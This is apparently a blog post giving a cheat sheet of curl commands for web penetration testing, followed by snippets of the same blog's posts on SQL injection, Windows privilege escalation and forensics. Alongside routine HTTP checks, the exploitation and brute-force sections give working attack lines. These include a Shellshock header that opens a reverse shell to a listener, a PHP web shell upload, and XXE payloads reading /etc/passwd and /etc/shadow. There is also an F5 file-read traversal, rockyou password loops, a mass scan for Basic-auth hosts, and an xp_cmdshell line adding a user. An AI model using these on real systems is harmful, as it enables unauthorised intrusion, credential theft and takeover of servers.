Skip to main content

Web Penetration Testing with Curl

In lot of scenarios, we usually don't have access to GUI access to web applications but in most of the scenarios - you can find curl installed on the test machine - so, below is a simple cheat sheet to run basic checks

#Get request using Curl
curl -I http://10.10.10.10

# Send Post Request
curl --data "param1=value1&param2=value2" http://10.10.10.10

#Check for Trace Method
curl -k -v -X TRACE http://10.10.10.10

#PUT Request 
curl -X PUT -d "PUT request data" http://10.10.10.10
curl -kL https://10.10.10.10 -T file.txt

#HEAD Request 
curl -I http://10.10.10.10

#Test DEBUG Method --> if Response "OK" --> DEBUG is enabled
curl -X DEBUG https://10.10.10.10 -k -v -H "Command: stop-debug"

#Ignore SSL warnings
curl -k http://10.10.10.10

#Follow Redirection 
curl -L http://10.10.10.10

#Add headers in a JSON GET request 
curl -i -H "Accept: application/json" -H "Content-Type: application/json" http://10.10.10.10

#Add headers in a request XML GET request 
curl -H "Accept: application/xml" -H "Content-Type: application/xml" -X GET http://10.10.10.10

#XML POST request 
curl -k -X POST -H "Content-Type: application/xml" -H "Accept: application/xml" -d "<Request><Login>my_login</Login><Password>my_password</Password></Request>" https://10.10.10.10

#File Upload
curl -X POST -d @filename http://10.10.10.10

#Proxy Testing
 curl -kL https://google.com --proxy http://10.10.10.10:443
Login and Session Management using CURL 
#GET request Login using Curl 
curl --user user:pass http://10.10.10.10
curl -u user:pass http://10.10.10.10

#JSON POST Request Login 
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" --d'{"login":"my_login","password":"my_password"}'  --user "login:password"     

#Curl POST Request 
curl -X POST https://10.10.10.10 -H "Content-Type: application/json" -d '{"productId": 123456, "quantity": 100}'  
curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "param1=value1&param2=value2"  https://10.10.10.10 

#Save the session as cookie 
curl --user user:pass --cookie-jar ./somefile https://10.10.10.10

#Login using the saved session
curl --cookie ./somefile  https://10.10.10.10

#Login with Authorization: Basic
curl http://10.10.10.10/console --basic -v -u root:root  

#Login with Digest Authorization 
curl -v --digest --user 'admin:admin' http://10.10.10.10/console

#Upload a file using PUT method
curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://10.10.10.10/test/shell.php 
Information Gathering using CURL

#Iterate a number from 1 to 20 in the given Variable and check the difference 
for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>';done

#Get all the links from a page 
curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

#get Text in much better readable Format 
curl 10.11.1.71 -s -L | html2text -width '99' | uniq 

#Finding Basic Authorization Hosts 100.64.0.0-100.127.255.255
parallel -j250 'if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:80 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}; fi; if [[ "`timeout 3 curl -v 100.{3}.{1}.{2}:8080 2> >(grep -o -i -E Unauthorized) > /dev/null`" ]]; then echo 100.{3}.{1}.{2}:8080; fi' ::: {1..255} ::: {1..255} ::: {64..127} > auth_basic.txt
Exploitation

#Exploiting ShellShock using CURL
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1 " http://10.10.10.2:80/cgi-bin/user.sh

#XXE - When you find /soap or /soap/servlet/rpcrouter Directory
curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d  '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <faultactor>&xxe;</faultactor>' 

curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d  '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]> <faultactor>&xxe;</faultactor>' 

curl -kL -H "Content-Type:text/xml" http:// 10.10.10.10:8080/soap/servlet/rpcrouter -X POST -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY test SYSTEM "https://mail.google.com"> ]> <faultactor>&test;</faultactor>'

#LFI on Apache httpd (F5 BIG-IP load balancer)
curl -kL --cipher 'DEFAULT:!DH' 'https://10.10.10.10/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
Brute forcing using Curl

#One Liner
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass" ;echo $pass & done

#Better for readability
for pass in $(cat /usr/share/wordlists/rockyou.txt); do
	http_code=$(curl https://10.10.10.10 -k --digest -u admin:"$pass" -w '%{http_code}' -o /dev/null -s )
		if [[ $http_code -ne 401 ]]; then 
			echo "Password Cracked $pass"
			break 2 
		elif [[ $http_code -eq 401 ]]; then 
			echo "Wrong Password: '$pass' --- '$http_code'"
		fi
done
OpenSSL Errors

#Resolving SSL routines::dh key too small
curl https://10.10.10.10 -kL --cipher 'DEFAULT:!DH'


Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in